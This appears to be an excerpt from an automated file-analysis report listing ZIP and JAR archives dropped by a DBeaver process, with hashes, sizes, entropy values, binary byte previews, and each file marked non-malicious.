      MD5:E9B0992C85CA44F2D75166F41EFA59CA
      SHA1:AAB4330A994713D3BC4C5CFDFBED5A9459F5A633
      SHA-256:24F1D58E33F055E9D2AA28EE23EBCD6320AB8328C8FCA53C415C2F925F0BB96E
      SHA-512:5CAFAB9BCBC34EA365678223873E42118A7D8F0A4383C44183D4CD158788823E29BA2FA512222423EBA14B912B55213F8220179EB5D2E5841AE2F25A8D0EB280
      Malicious:false
      Reputation:unknown
      Preview:PK........:.cX................META-INF/MANIFEST.MF..[o.:.....h.:.%.B.....{......9...&.v.....K.nKw..yC3c........Y..B.... &...a'.s..=.67..m...j*/...$J.R...f.j. .!..I&....:o...w0....o..7......R?.J5..n.!8.<.&.T.A!.,.I.......6........5bLxF.../'..#...|...<.4.?...#.r.....1..0.Q..o..n.............xH&.p.!.3..j.&..#......~.6F...M(.h.....D.. #..!{{....=..W...6.B.......'B.........#tmq.S..<_~9..m.6......j.7.-...{.....*...1...jJH&....0..{...i...Nd<...>.....7.&..E!..z..q.[..1.KG4@.,.Q.{.0......3H.._....j{....o.M.s.../.D2q.=g.^3f#.=..}f.^....Q...e...$X2.wj..\.(....'..'1..:.=a....&e}.Z.R<.k.qh..i.........Q.j..1..?.f.S....h.pl..!.........O...<....~{.~......'..:NK.Ac..i..x.....(...yz...].fO.=.G...C..\.......Ch.U..t..[.....L."....A.:N.Ew0l...X%./M.Y....$-:m.+.{2..q}.......F....M;y.-c.hv.c.;.L.=..w.........yC..%t..2]k0,.G.....P.^.Tj6...xDmw.Kw..'..1...}.c9./.n-X.e...<.3.Z..!..n....4~J...".3._s..KGkZf..\..1.H.ng.B.)....h\S........"./........z..(...V......7.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):51797
      Entropy (8bit):7.879094694826159
      Encrypted:false
      SSDEEP:
      MD5:034C58B17083CA1FCA59DC5A8B372BD3
      SHA1:2635F5F07293B086881A68550036D49E6CF62842
      SHA-256:CBA8A38CC8D110EADCD4176F652B4F2A622155B11E700B99488C01A4245F96B0
      SHA-512:B29022CE24943824D854044497483DFF3FFF9A809604F1BEF34AC1BD2842AD54E251887A663AF6840C8A093502E0557DB77F7711D0EAA7BA7CD48EAA338050D1
      Malicious:false
      Reputation:unknown
      Preview:PK........@.cX................META-INF/MANIFEST.MF..[..F...j....J.QPn:.y@...............~..e.d.d.........O...n@.5..R.G/.V..~..0t.c'hh... .56.[.Rk.m.'p....Y.wx.9.0...0~~..03..-..#'...Z.V.}[2@......j\...l.......,Fi.Q.@zJU.R..@.#.ak.!./Gc.6...i.+U......^R.....AVq.f(.~....).l.d.b.w. .f..|..M/....,....*.B.xx~R....4......a....#.Dy.U.......9.Az^:......]^-}s..6hf...sx{.2]"M.\..o.; |'~M.]...Fl.............Y@..=?.e.....vP...........\h..bf.K....x[.b7...o..oZ.w.....aV...n.....n.@/..>....{....._>...zm1_.|z~z~....E.kQ,...%.kI...s.../..t..T....I.}z..'m.6....[]......a:.l....R}.x....17.y....<.Bj."_........@.. 3a.N`ER.8.P..C.vr!g.\..v...P.IiK..r6.......z.^u..F..p.$r.EY..V]'Y7p.....*........Q&0....`%T..Y...'..z8e..0F.p...u.P..pI..=.D3.k...!h..@z..[....l..n.{.B.46..q.9.*.u{....M9.8...]Q]..8.#.$.a.u...#._;.p@..}..C.X:..J..........._..=.R...f2<lq.%.1.f.....P.7.02....J..pw1.d.q[..ZcA.E.......u.@.f..*.D.....1..J3d......G1...2v..4..J.........2........ ...6...{.!U..8...SG
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):35243
      Entropy (8bit):7.802338530338758
      Encrypted:false
      SSDEEP:
      MD5:964C99E71F64D9AB650CFCA09108A4DB
      SHA1:24ADD601D1C2AF83ACA295DABA613E4013ADD9B1
      SHA-256:E2065E40ACB127D6F0B594143B2484901D6AFC7C472C57A2F6D4677355EE8B60
      SHA-512:59A0EF8DDA5588D4C52508E7DF0C50B351BC80ADC2CBF9899D6811C33247A7B4D855CDB885AC4DE21372AF6A043CAAAD9116E77D54E06847B06ED26FF22B9ED6
      Malicious:false
      Reputation:unknown
      Preview:PK........E.cX................META-INF/MANIFEST.MF.W..H.}.....cb.;l...k...T,q.A}.@H51.!.E.~.....,g.j.\.9..{3.....`R.@.a..U.u..FJ!.j}oW3..-...1......K7.f.g.W..t..x+.d ....FN.C...q).=.j.3...9O...."=...A..I.C.....`.!.>-..M..A../@)....(.u..:y..........7..{...........N.q.. .`PS...:....^..E^...yRt...R..O.K].s<.<}.......<}.2.9..u.u{3.q..P{By..\.....(..$.I.....%...8B....O3....o...~..7...8U.I.s..&.k.no.b.%.6v.../5p{#.$.J...y...C..Meg. ....$L..?.e3.......>.....1.o_....o..}....9#S...32.B...*...d..n....k.`\JZ....$..@P..=..p.....rWI[.M7.[#a}.b.A..'qu<....mY%c...........(.....R.m..1K..L..U...5..9...xaDNK.`.y_V..4...S..E...[.C.~...Z._...c...x..&j.......XX-...:....Q..a...?#......:..Z..!..H.....j.{....m../.x..~..w....X[...7.j...V....j......<{..T.....<.+u.m...#.]#..]....`bZ.f.0..7.'.{...C.....%Z..>9v...k..Xu..{pD..N}.....1..s.}Ekdt..6.P.A....$~.+.!..6..j.".mWv..=.}$...3V...U^zp?j..A~)g.1....[.A..F~+.._.#hy.....H.~[..._..'.F....9.;..).X!f7......a.....6.K.._...G....6.X'
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):1289824
      Entropy (8bit):7.9310326056295315
      Encrypted:false
      SSDEEP:
      MD5:4BC543591D2034B9885275194C80C7F1
      SHA1:26B1E2CE6FEB9B25035CF09CECE30EF034287497
      SHA-256:5D170413E7586D7DFEFC76677F95277C907357A775CC059A2CA8F4AA1EC51B20
      SHA-512:F09F279CC66EF748E132808336241CE1F2D85B20370FD31B5FAD3C97251CEA633FC488AD04BF9BFC51581A690A405AF26EF31FC184F76C1B8E75CB194CFFF272
      Malicious:false
      Reputation:unknown
      Preview:PK........;.cX................META-INF/MANIFEST.MF..Y.........h;Vv.l.v#.Q..~.........C..,._.!..U.(K..>...!..p.|..L...?u...,......./..b......5^..iA.....b./.........D..?.c.. .....c....D..........o.Njg....._.Afe.~S4'..n..?h;......?...>L.k...}xVz..QPU..Q...9...U.......z....q~ .;[.Z.......R..1+.Oj.......Xup3..9.D............+Hk.L....o......_.....R...J......t.8.+./++...&..)...y...........:]>..XQ..n.;U_.N..&.?......qP............u.......$..xz....'..!......|...I?0....#m.6..K3.\.|.?.usC.G........8..t_.......1.....A.y..iQ|0.6...G...y..Oo......U;]=............l.....Nj.//.?o|.....n..4..~..Ow.K..........nV&....NO9.'.t.-....W.........Q8./..).Vdzs2j.C.2.?..ow....*.....{.d.1?`z..1m;Hg...<.)...c..c1Oc.......zN.Kw|.'.}sbk..s.'M..v.6....p...a.p..Q~.2a\?N5'...,I.1........... ....I.....}..Q........M.<X...t|.....F...o26.J6k.....l.:...X........]..fn..?...G9.g.~.Z...........k..7o.J........,..............|y!..B..........5.......6.2....!..Y.r.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):34532
      Entropy (8bit):7.84146618927024
      Encrypted:false
      SSDEEP:
      MD5:9B3F92B97349B5BEEFE648F18CAFABB2
      SHA1:F64000C83A03C305B9923C5AB6918BE88B0F5097
      SHA-256:BEB423DAC793EF59931870E3F32DE7641285D80065CF5B5EFFA12AE6CBEEAD0E
      SHA-512:735943A1565741124D6C9B99C741CF7CEC1F1B12D593067ACF77C93A355B2E5DE0A247F231EACBE617283DDADF0B3D3169A1B17C7AB4707E41DFA363FF79A024
      Malicious:false
      Reputation:unknown
      Preview:PK........;.cX................META-INF/MANIFEST.MF.V]s.H.}OU..ukk...*....<.... ...5...8.....w..wo.o6....=..nF...a..f.F...B....I...........x.M..>..|U.k|......=.<..#.eD..d.A..7v).^.K.s.k...5..#...H.S.......'./..Z.x(&4*...}x....C..^...............`.........3..1M.....\......,.@.......#\.m7FG..<..$.G.......QX..]PB7@a.....L..3...u..$...u.W...O!.x...tt...,....dN../.t....*..<....s v7..s..=..p.'....w....1.LQ.a..*..@......"....c.s...K&pw...jx.....bP.....(f..........%.x.U..U.q.2.....3e..gQ..5.)H...|....q....|.z............`.$>..v.]....|6c...a.\.i2.4..5.{..G.ES5...]..|u5............ .h...B..F.2.&.q.}..-.o...q.-..J"L.!m.....m\O.Nt.p.....@<..f..U...u#. <h....q.J....-.^...V....Hf....y.g...........<).-.X.3M..05.s...e.....o..._.F..p..DcA.`....v.p@?..r...K....'i.....z......=.A.+..!"..a.=....\P.1...5-.......Si..z....<.V;.mV...}..[....R..v.......aFy.q.f.....MJ.N....>..+.4MF..J..3.....X-W.-...U...M..N.+4.I...l..^.E.J.T-....v.dMU...ZR.5..&..E#l6#.[.....0..sq[..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):850752
      Entropy (8bit):7.93200582392887
      Encrypted:false
      SSDEEP:
      MD5:2577948912F9BA076BDA689D33E9A052
      SHA1:4A16C05E4DCB29514811797450FC405898BCDF06
      SHA-256:7A4FAB69B308C726FA758E487C8FE5694B582F462696D74C0E69DA120647AD1E
      SHA-512:7450434E41DBC60C6EE677547E2D509DF047CC0B8925D8268C0D20BEFBC12EC76D7127C470475D7571272C7A500072F00783BB1B5FE08F46F2820E52BBFA196C
      Malicious:false
      Reputation:unknown
      Preview:PK........!.cX................META-INF/MANIFEST.MF....X..|.....'*..;t.d..O......E.qsB.y....2s.Z....V....9.0.0s...%h..[A..e....B......o.O.mT.w}....!.......ZA+.@....M........4...?..m......O......}../F.^.../.....^>..m.T_/.../...dg.C.+....s.Y..Z6.I..._...?./..?m\.Y.]).......?a......r..d......?.+[..7^..Nw}.z#...Y./.~./....h.'...}.._?..)..i[........C..>n...^|}p.eq........g....../h.......l.....?.._\..o.}..nO..............v....v.......y..I.;....|.X6.{.i..s.?...{..z..Iy.....z.m...........[.l+.+....?...%.....^j.0n.f..........n?.....?..LU.t.V./u._.,..*.e.x."..T..n......~....t..<.......x...+....t......*q.'u.f...u.s....g~e...WnTA....O|...z...u.?........~.....>{....J......G..NV.w~........;B.......nR..c...|.C.......b...K..j ...MMn..q......U...s...................1......,..L...........u...o_..1.&..@.l.]......./.+'...~...............qx5.....QC.`.`..:.#U..v.T_.){...".=.......r.|.:.a._......b..$.....u9..(.D.5..*u...M.r..x..C....v.Y.....o..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):101669
      Entropy (8bit):7.875423258659922
      Encrypted:false
      SSDEEP:
      MD5:DBAA9337AE5821237B449AC1241D3144
      SHA1:0990D55F45B5BBE1B767745DA7BDCE63EE10B04F
      SHA-256:FD00B85111677977651DF4D8A6F2412FD5729278DEBAD6AEBAD47C4F62E17CB7
      SHA-512:0DC9F90E5CAE22A83B0EE45826DB39A4C1268C5979C42CC1E1DC8A49F6E00055B9BDAF769D51A02EB5A026D2A3BC9AFAB7AEC485682C97BC0584B3E9D84FFDEF
      Malicious:false
      Reputation:unknown
      Preview:PK........;.cX................META-INF/MANIFEST.MF.YY....}o..C.j.iF.*l.j.3..../..2.^.c~.............i...'"..E>......(.<.O..O.6J...?j.pO...1=J....BPh.M`....y.._.<........'..v.......K.....a.uj.2/..<.g.O=.yU.NJ....)...>...6.N.D......qT.O.!..S.....(...l.m...1.#.O0L<....U*H.]..........D.....b....u.N.V.&........6......j.&QQ...T..............w..<Um.6...s.....c..8..p.X....{.v.S...O./1.i....Ooz3..E..y.....H.....y......xQ.W..s..O.....~......2.......'.P.U..nl.....[.g..m.Z....>....j.<=..}.s.}%.M..9C..DI.(....i........._..........?~.^...&..._.?}..jk.lk...../...._.M..W.u.4O..?i<..`..<.NY..$d.h.........;[L..@.......!.'....Q$m.eO.4...I.....A...e..6Q}...n.....U.W.....:&. .........S~>\.h......d.......q...bI.Q&.>'.y:..)..C}F..~-.x2i.sA^.~5.....G.|.c..n.$.B./1.....5Nx.$v..P6v.....s...&/@.D..1.k.Cq]...#F.,lP..U...u[...w-..w..e'.fv26..^.........(.d.......@'....j_..ljMm...(!..N.oB>.ev}..5..n#..b.t.^8.q..K.G."3<.EG.X_..;1PN.T...x..o........F....Nzp..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):33532
      Entropy (8bit):7.861162597371419
      Encrypted:false
      SSDEEP:
      MD5:A07298EBF4D530279C750EB9AA1D2FC7
      SHA1:FCC5E2C650C8BF016672F9B95F1B0A025FEB1B61
      SHA-256:930BA6D139D790E92B6EABAB19166050F5424FE5E22988CED14E8737FC309F74
      SHA-512:CCF9660E75888BD95E1598977EAFE59B2AFB60DFF4B58DA31B61367E8D0AB4CD53AB5CAEB5355681DC2D2F573F86BBC9C6F708D62B476A33511F335AA7ABFB77
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF.V..:.}....R.n%E..>.y0f.....%%......m.>.%073d....9}.....iTZBBQ...DN..Z1.vI...y.-vX.yf ...$A..e.,.+..R+.+.&.'H8..s.. ....V....F./..Kh.}; w.v..UA.Hx..........,.#.!.!.^..3..0........D)..I.8zy.."..0b0.#...H..p........b.(,...4.KX."tb.._.........~...Jn.^.^.].).P..hwW...<...S.)7.0.)..B~.r!..$. ..2n..r$.#..|.p3..@......6...,.....cB.7^.(...(..Y.4.....w$..V@.L.Q.....8..9..........{..........b..O.\>w..?....1......A.w...q.C7.y_.I.Z..\....jS5.D...e..A;^M.h\>.n...Ms....W..W.!.].s.._g<..}.k..$M...v.\..SC....2w....u_w....W..nL....`....bF{|U.vV..nO|....l..V4*..\......n...d.SK..cQ.y.....{k.....D..Q.E...N....)..B......q%.Qj$.Vp,m>@z.....a..(B..3$l..|..T..a.,....W..k.Q....E.;..u:1[.e.F....8.....@!.Y...M.=...u.)......@..Z{.QgT..J<P&G.k.E.\+...+V...z.Q/.>......l._... ..T.W.L;.f..H.u....r.h........~k....&...`...zj.R$...AG.M..e.f..4....d_..S....k3...[......i..>..^....1.F.35.G...nMEa.,...!2.."f.[..^...B}V=mUL.x.. \W._.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):1183961
      Entropy (8bit):7.880239522881985
      Encrypted:false
      SSDEEP:
      MD5:D79F478E21504919766FD499AC033E86
      SHA1:77D4794C6E1C918F8FFD3CF48417F6DE48091F71
      SHA-256:2F8668BF2B3F98C1424EDC00768E878C408FEBF59BADCE79E08256CC6553EC8D
      SHA-512:08A416BBDB93720252060F3FD8DB2CAFB0979CDFD5EA0F3E86936E06A1201E7B36A80682389694EF51B7D26249DD70DDDC0F45C3D2DDA9E945F15401436AB649
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF......z?...S[SG{.UEc.am-...........O.pDfVV..G.u.2....1.....J......K..?..........ob...7..\...f.e...B ..6..........W........?.A.......P.E...{.?.F~..*.....C..._t.6?o*..?n.....\zu.....m.{..].......vi..a..._};..4.......a.....{{J......eX?...y...tt.G.5.{Z.a[.......x....2e.{.......m......?.V;T..&..zgi.?.i..>=...Q.^zZ.n.]...~<..E.......a.f..a.....M.y........../.-oz...c.N....l],..dy....Q..[...7}..{x...7T...?v..<6..<P.}....Y.^.L|...~.`y..g.&l.4\yG....h.....6.....L..wt.2.Zx..6..}..../....h.?m.?..o.@...8.f..?..zh........eYW...E......?.7}..qZ...N..|.=...vy..W.[./]A..............$,..x...[.9Y&..ex<......[...J.o...e...R.....g...ur..-.:.......E..t..O:..........H.eY...u0....I..f....."...Zwq.{...h.Va........._./..]..?.{|........._...?...H...........r.4~.......T...y.7d...."..._S..{....4.....n.}..=..=.......i.~Q/S...r..V.5..Hj7.l..x..tm..}c5-U;....w{C.?.....y.[..{.Rzgg..rL..7..,..m..5kl@.p\F...e!.....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v1.0 to extract, compression method=store
      Category:dropped
      Size (bytes):139869
      Entropy (8bit):7.945046144235116
      Encrypted:false
      SSDEEP:
      MD5:18E9CF2CEE8A19753C19E41B2F4A6F75
      SHA1:7060EC107BE9463D43F0BBBFA6199A0BAFBF7C16
      SHA-256:3A48B6B664033B2ABB16DFD851FEFBB7E3CA6EA6EAD9F2101005E8C56E19FF2A
      SHA-512:1913E7FB34D0251ACD64A8697C2147B6C5677337A5B9F22099E7904A45D9988E0CC1431BCB2DFDAD3FC6F19EA584410FB4F1DE8992929710443C672AF5BE4EC7
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/PK..........cX....4...7.......META-INF/MANIFEST.MFe..n.0.E.........J.-R*..6H....7..Nq..v".....,}..W*.<..l..). .!%K..b.s....".[..5.`.yD.B..F....|.^.Bi`.5...;.U.....K.G.:o..2..].[v....F.....#:...[E...a<...8.N.y....[5.6....'J..B...@..g.d.x.LA..T....G..kB...w=..tu.Q.....H..'z.{5.$~.5%..\x.,5.....o3.E)...7.5.C..r@..&...ax.f.Q..z4....h4....PK..........cX................org/PK..........cX................org/jkiss/PK..........cX................org/jkiss/utils/PK..........cX................org/jkiss/utils/io/PK..........cX................org/jkiss/utils/time/PK..........cX................org/jkiss/utils/xml/PK..........cX................org/jkiss/utils/csv/PK..........cX................org/jkiss/utils/rest/PK..........cX................org/jkiss/code/PK..........cX................META-INF/maven/PK..........cX............"...META-INF/maven/com.dbeaver.common/PK..........cX............2...META-INF/maven/com.dbeaver.common/org.jkiss.util
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):72194
      Entropy (8bit):7.954578461590385
      Encrypted:false
      SSDEEP:
      MD5:9E317C75534BD1DA8C00A67C618AB288
      SHA1:F1A9E5508EFF490744144565C47326C8648BE309
      SHA-256:7AEFD0D5C0901701C69F7513FEDA765FB6BE33AF2CE7AA17C5781FC87657C511
      SHA-512:8739143062B0589E3C55D9A8FC67B716CC9B8CE8ECB6F4C1F968B587B3117C6806DAE8DBA92C79A52EEEF05B10B25B01BB26F4E77FD20D2F52DDF2F56438901F
      Malicious:false
      Reputation:unknown
      Preview:PK..........A.................META-INF/..PK..........A.%...r...6.......META-INF/MANIFEST.MF..KO.0.....F=...XiS..#.P.Vd.>q..[?..8m..:....j....Y..K........4.."M...c.[...n=-.R .z..`...5zj..8.........i.h.X.g.....1....X.....K..6..4.X?..ir.L.(....f^.=s[...un7... .KA.G..";....OS%.z........yy].9oyHX...@0...#m.........:.....?.n.o...rK"....~...&U...'.....*).....r.Z../.k\}.v...(.F.._.F.<...q.6..A....cG4z... ....D...o.....6.y..=.vh.d..].`..@..i.&..PK..........A. u6.............module-info.classe.A..0.D..m.U.T.w....<..Hj..i....\x..%.V..,f..>3....`...js.]....",Mq.Ff*-.Jra5O..&.1.....0.@1<..[.J....L....s..$-.84...1&x.zV....a.|.>V...w....UCLZ._PK..........A.................org/..PK..........A.................org/objectweb/..PK..........A.................org/objectweb/asm/..PK..........A.................org/objectweb/asm/commons/..PK..........A.g...d....'..-...org/objectweb/asm/commons/AdviceAdapter.class.Z.|......f..!@B.y...I..B......M.E.u2...d&.#..........>(.fUZE......
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):34041
      Entropy (8bit):7.922772262416954
      Encrypted:false
      SSDEEP:
      MD5:31C84EF7CC893FB278952AE2D6A2674F
      SHA1:9CE6C7B174BD997FC2552DFF47964546BD7A5EC3
      SHA-256:D92832D7C37EDC07C60E2559AC6118B31D642E337A6671EDCB7BA9FAE68EDBBB
      SHA-512:E798D451ADDABBAEACE3ADF8D8E939430241D9665C81B98B0A7A705C9B91DDBB67FF86B1F7B9A7EF317F225D38DA3319ED40E0FD33DDACE3D2AC75C3F7B78B02
      Malicious:false
      Reputation:unknown
      Preview:PK..........A.................META-INF/..PK..........A.....l...D.......META-INF/MANIFEST.MF.QKS.0..w..a.3...3......`...C.`$M0......U.d<&.....Wb...g4Vh.B....0.H.P.'..<...B\>.Ht....{+,tgC.K..:p(...f\J.H..`.-.....{..7s..\..aix.[m.'.U..v.{.\....N....^.6a..m....YU..HPY....../yn.-.ZwJ..A..1...i.1.Q.0.l.J.FS.6.g.......jd..W).z.o.0.F;L.r.H..hU....GA..U.x.-....L.{.v.m(..d.W.U....Ss.Z.5e.N.P'...JV......Y.R;...8.....8..*.t=...D...-..d...D..2..u\....=.{.PK..........A.i.T1............module-info.classm.M..0...7VA...[]..]i.!<D.j @...w....P.....b&.|.7....`...O..u....",t~.:.....K.."W..L&w.....v|K.....a..B.>...U.P....0.Ra..R..0$8.....).....X....N..._.b.j|.PK..........A.................org/..PK..........A.................org/objectweb/..PK..........A.................org/objectweb/asm/..PK..........A.................org/objectweb/asm/tree/..PK..........A............. ...org/objectweb/asm/tree/analysis/..PK..........A..e.......>......org/objectweb/asm/tree/analysis/Analyzer.class.[y`T....7
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):51935
      Entropy (8bit):7.88489083655947
      Encrypted:false
      SSDEEP:
      MD5:6062608F1A98AFE1E853D01FA1221A9E
      SHA1:C0CDDA9D211E965D2A4448AA3FD86110F2F8C2DE
      SHA-256:C43ECF17B539C777E15DA7B5B86553B377E2D39A683DE6285567D5283888E7EF
      SHA-512:AE0416AE62B9260DA5012A3C5B6E12F34F4A0D016EC9CC9A2A1E771AF12A9D63E36315C199F85D7A9D424AE39500253DEF0A0A581BEFA26D4372B21EFEC44781
      Malicious:false
      Reputation:unknown
      Preview:PK..........A.................META-INF/..PK..........A...y.T...........META-INF/MANIFEST.MF...n.0.......I(T.. ....".5.w.,.......uh..(U...7.q.$_......J...|oR...(..;......0XL@.a..-`P.>.)...d.kf...b.:.....@(].......Wz{..Tx..}ohe!0....y.....n..)#..FJo...(..7...}8.........e.l\.g.Q2............j.....".z....j..-..3~X..H....-...V.~[..n....g.r.....\%9.p..-..4../S?p....0q?8..9.[...7.....~....4..b.KUa..3..I3i8.......{.PK..........A..q..............module-info.class;.o.>...S.^F......T...|v.FF....t........$...\....Ta.fF.fK=3F.A....l...Y.e.zI..@...s....A.0p12...-m```b..F.. ........g.......9n.:..PK..........A.................org/..PK..........A.................org/objectweb/..PK..........A.................org/objectweb/asm/..PK..........A.................org/objectweb/asm/tree/..PK..........A...r'........-...org/objectweb/asm/tree/AbstractInsnNode.class.XYpSU..N..M.e......4..J...T.Yj.....M..bHjr.........>..XQ.m..'.}uF...f.s............s..7..|..j.&..P...Fv.Ys.>..J..f
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):91131
      Entropy (8bit):7.972650843530843
      Encrypted:false
      SSDEEP:
      MD5:BD3BC1C176A787373E9A031073C9574B
      SHA1:F77CAF84EB93786A749B2BAA40865B9613E3EAEE
      SHA-256:C635A7402F4AA9BF66B2F4230CEA62025A0FE1CD63E8729ADEFC9B1994FAC4C3
      SHA-512:1B92E1FAE7D0C082BCCF751BDAEAE3BF32D28B9E555C9989AD70D3E5156D19E9547232C5886A53AF1973DA51BF9F61266336F3BCC55EA2CF972B76370A0BD8BA
      Malicious:false
      Reputation:unknown
      Preview:PK..........A.................META-INF/..PK..........A...FB{...........META-INF/MANIFEST.MF..OO.0.......i.C .i.........k...&#q....(.`.5~..g[....r.<.u.....a.]WsE.iF...dE)<.T.%9........j.+p.*..K..c...a.b.#(LIP.6s..i0.X....>-.8....KE.)..)<3..n.]%.'.....,H.@x._%..B.......I..^_f.y&x.m..c.-A.-....B;a./T...I.a...^..TfK*|3K.ki.nfK.g.8i.....%..eoo%[......N.....i...N?....6.f-?....T#{K?....sH....VN......n3......Oq...QH...6......'h..]..5...=+........}....PK..........A.u.............module-info.classm.M..0........^....Cx...@.&.4.8....."...7..{..z?.....^.Ne"7QvV...T...0...&C.t.."J.,...;..c0..o..."..]G.a..{-1..n,...B.s.A..F..".L...i].=|.07..c...c6.6..N..u.|.PK..........A.................org/..PK..........A.................org/objectweb/..PK..........A.................org/objectweb/asm/..PK..........A.................org/objectweb/asm/util/..PK..........A.....6..=...%...org/objectweb/asm/util/ASMifier.class.}.|T...{wo.... !.P..t.....4...d."i.P...<.....y*.>..b..{A.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):123598
      Entropy (8bit):7.976170979690362
      Encrypted:false
      SSDEEP:
      MD5:6F8BCCF756F170D4185BB24C8C2D2020
      SHA1:AA205CF0A06DBD8E04ECE91C0B37C3F5D567546A
      SHA-256:3C6FAC2424DB3D4A853B669F4E3D1D9C3C552235E19A319673F887083C2303A1
      SHA-512:01A5EA6F5B43BF094C52A50E18325A60AF7BB02E74D24F9BC2C727D43E514578FD968B30FF22F9D2720CAEC071458F9FF82D11A21FBB1EBC42D8203E737C4B52
      Malicious:false
      Reputation:unknown
      Preview:PK..........A.................META-INF/..PK..........A.T j.............META-INF/MANIFEST.MF.QMO.1..o..a...h....{..1.z.vg.......-j..&^.}.{3k.E..W.N......B5..j.|..g.%f.X....C{.....t.5s...cP.<rS!.....4....2..c.W.q...O.i.+.dn..v....M6.0..9....HY...L.bNn.L...X....U.L..j1.7EN..G..O.`..MH.AXGM.......-.[.h..*?"o.5r..k..V..Q..!....J#........1.'..l..n.}.'.....p..N....xIN.4..PK..........A..Th.............module-info.class;.o.>...S.^F......T...|v.FF....t........$...\a.fF.fK=3F...D....Ta.6.Z}.Z}.Z...F.i.a.......T...F.6_.....L.0....$..X...X.<...(..'X......PK..........A.................org/..PK..........A.................org/objectweb/..PK..........A.................org/objectweb/asm/..PK..........A....-....+...)...org/objectweb/asm/AnnotationVisitor.class.Tms.U.~n.6.fS.....$.m...[....-Z..8..NX........t..:..._....7?.......2...{..s..9/7.........Y....CY......j.....V`{n.n..'!...Z.V...zaK.'....r^d?....DI f......gI`|.v..].D..+..."se..t.1......"...zJC..8&.8&xI.2.../.Z......,
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):55580
      Entropy (8bit):7.801014865809254
      Encrypted:false
      SSDEEP:
      MD5:0145FE4423C9535291E8330D7B31C61E
      SHA1:2153BB7F8B45CA4130B96DBF3BE6CE0D25170325
      SHA-256:529DA7B6806AF4D788ACC0AEF0079C9C920F6CB1D2679C8F392CA552FB2E1D35
      SHA-512:6912A42379D59EF081DBAEEFADF987E6E9119703B1A76AF5C7FE527D33399C23A0016AD71DC0C82BF17E227E65A64A2FD8B986640A7217A814C2C8BD854AD205
      Malicious:false
      Reputation:unknown
      Preview:PK..........A.................META-INF/......PK..............PK..........A.................META-INF/MANIFEST.MF.T]o.0.}....x..)...M.Bj.v].f.....'c..*..6._............{.....h.=..\.......F..p..dZ..}.%.D..:.....|V:...H1.\Vk....~I...;a.O.Qib$1. ......Qb2.b.s..)^.K....#@Y!M)p...z..i.8."P..<A\B!+<F....()/...[....4".....].G.rD$WJ..m.".?.q.>Wq.r...].S.p0@..j..........&$..T2....nP..x.g.e..F.0J[.b..kR).+Z.*Rk5e..........*..:J.h.M. X..M.R...MS.4....[..A....\<.J.k.e...tP4.....j.m.p.....=...|..YHjt{G!.fQ'>J.lr.O....5K.2..&..Wr|..'....s..D.Y....:.XY./..-.u.Ht.....".*|kn..06.?....t<.&...]Ie.[..i.r.h....p...,..}h.P.2].X....|*.4..>Ds:W..g{#.......YH.d<ep<.M...)....4xO....%.N.d2..._...-....?.z...~.\...V4..7....D./..Qt.]w.-...1...!b&.u-..E.........n<......G.'..t.._PK...M.m....m...PK..........A.................META-INF/LICENSE.Z[s...~...r.Si...4i...CiD.n......."..(6...s..HJv.o.dZ..={....Y..E/...u.:.^<..?.u.t....B.Mv........<.h7...W....\.6sc.....z....~Z...J.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):66447
      Entropy (8bit):7.680686408108812
      Encrypted:false
      SSDEEP:
      MD5:4A735F9358D5DB1314FD46644CB25398
      SHA1:5E4804B15F3D99C52D0BE15B51736699C434396B
      SHA-256:0653852DEAB5C6F6E9C84E3AA8F72E72B9CE7DFAF7A6431F3D80F6F9D7A433AD
      SHA-512:302FE459FDB74C1005883CEB19AA9F41F63C1D264E45535E2808524751892B4AB68FB1F617B26CFD5E90D74C410E7AF260E608B30D5C8BFC71E8E5F114AB816F
      Malicious:false
      Reputation:unknown
